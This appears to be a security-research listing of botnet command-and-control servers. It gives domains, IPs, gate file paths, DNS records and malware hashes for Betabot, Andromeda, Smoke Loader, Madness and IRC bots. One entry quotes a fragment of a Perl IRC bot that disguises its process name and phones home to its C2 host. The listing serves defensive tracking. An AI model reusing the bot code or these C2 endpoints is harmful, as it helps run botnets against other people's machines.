Found by Yewnix. Local users: Current Local Users: 297 Max: 753 Global users: Current Global Users: 884 Max: 1536 Server: 210.205.6.30:6667 Chanel: #testdos Hosting infos: http://whois.domaintools.com/210.205.6.30
frineon.su (Smoke loader hosted by fastflux botnet)
Server: frineon.su Gate file: /forum/index.php Hosting info: ;; QUESTION SECTION: ;frineon.su. IN A ;; ANSWER SECTION: frineon.su. 150 IN A 91.188.52.67 frineon.su. 150 IN A 212.92.228.65 frineon.su. 150 IN A 109.200.244.121 frineon.su. 150 IN A 76.66.174.231 frineon.su. 150 IN A 98.218.49.187 frineon.su. 150 IN A 72.185.70.143 frineon.su. 150 IN A 72.185.199.204 frineon.su. 150 IN ARead more...
irc.teamirc.es(irc bots hosted in Canada Toronto Cirrus Tech. Ltd.)
Credits to AliSs for this. Server:irc.teamirc.es:6667 Channel:##ns## Now talking in 00##NS## Topic On: [ ##NS## ] [ 5RanDoM ScAn : 160 – – – 30/11/2013 16:21 12] Topic By: [ LoSKi ] Hosting infos: http://whois.domaintools.com/199.103.60.15
ajw555.myjino.ru (Madness DDOS botnet hosted by avguro.com)
Resolved ajw555.myjino.ru to 81.177.141.241 Server: ajw555.myjino.ru Gate file: /index.php This is the same domain as the previous madness botnet. Hosting info: http://whois.domaintools.com/81.177.141.241 Related md5s (Download sample from Malwr.com) Madness: c45034111810d1a56ba6b72acc63bdf5
dorblu99.net (WordPress bruteforcing botnet hosted by hetzner.de)
Resolved dorblu99.net to 88.198.17.49 Server: dorblu99.net Gate file: /cmd.php Hosting info: http://whois.domaintools.com/88.198.17.49 Related md5s (Download sample from Malwr.com) Malware: 1e8cd0f0f1702820c870302520bc0176
perl.jorgee.nu(5k perl bots hosted in Germany Hurth Intergenia Ag)
Credits to AliSs. $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } my @ps = ("ps","syslogd","init"); my $processo = $ps[rand scalar @ps]; $servidor='perl.jorgee.nu' unless $servidor; my $porta='8080'; my @canais=("#perl"); my @adms=("M","st0n3d","x00","Jack"); my $linas_max=10; my $sleep=5; my $nick = getnick(); my $ircname = "x00"; my $realname = `uname -vr`; my $uname = `uname -a`; myRead more...
xylox.su (Betabot and Andromeda http botnets hosted by Panamaserver.com)
Resolved xylox.su to 190.123.45.12 Betabot Gate file: /forums/order.php Andromeda Gate file: /foo/image.php hosting infos: http://whois.domaintools.com/190.123.45.12 Related mds5 (Download samples from Malwr.com) Betabot: a670deb3dd6febfcfda8392305041657 Andromeda: 26c7885b95501af4da1ffa621f793027
shatteredwow.com (Betabot http botnet hosted by limestonenetworks.com)
Resolved shatteredwow.com to 63.143.49.122 Server: shatteredwow.com Gate file: /beta2/order.php Alternate domains: modbrandom.netsxyza.dyndns.wsseattleschools.cocnetwork.eltsa.comthex-net.com Hosting info: http://whois.domaintools.com/63.143.49.122 Related md5s (Download sample from Malwr.com) Betabot: e5a03d368fd4fca8b45c83a05dab6ced
nomoguz.su (Betabot http botnet hosted by fastflux)
Server: nomoguz.su Gate file: /SDF9his/yefgvrtu.php Alternate domain: cooncatcher245.com The same fastflux setup is also hosting this betabot. Hosting infos: ;; QUESTION SECTION: ;nomoguz.su. IN A ;; ANSWER SECTION: nomoguz.su. 131 IN A 5.165.17.205 nomoguz.su. 131 IN A 176.194.193.47 nomoguz.su. 131 IN A 66.231.16.101 nomoguz.su. 131 IN A 145.255.33.9 nomoguz.su. 131 IN A 188.0.98.100 nomoguz.su. 131Read more...
nigazz.com (Betabot http botnet hosted by besthosting.ua)
Resolved nigazz.com to 194.28.173.217 Server: nigazz.com Gate file: /neg/order.php Alterenate domain: niggazz.com Hosting infos: http://whois.domaintools.com/194.28.173.217 Related md5s (Download sample from Malwr.com) Betabot: 7355a0c56919550566ca50e33162f993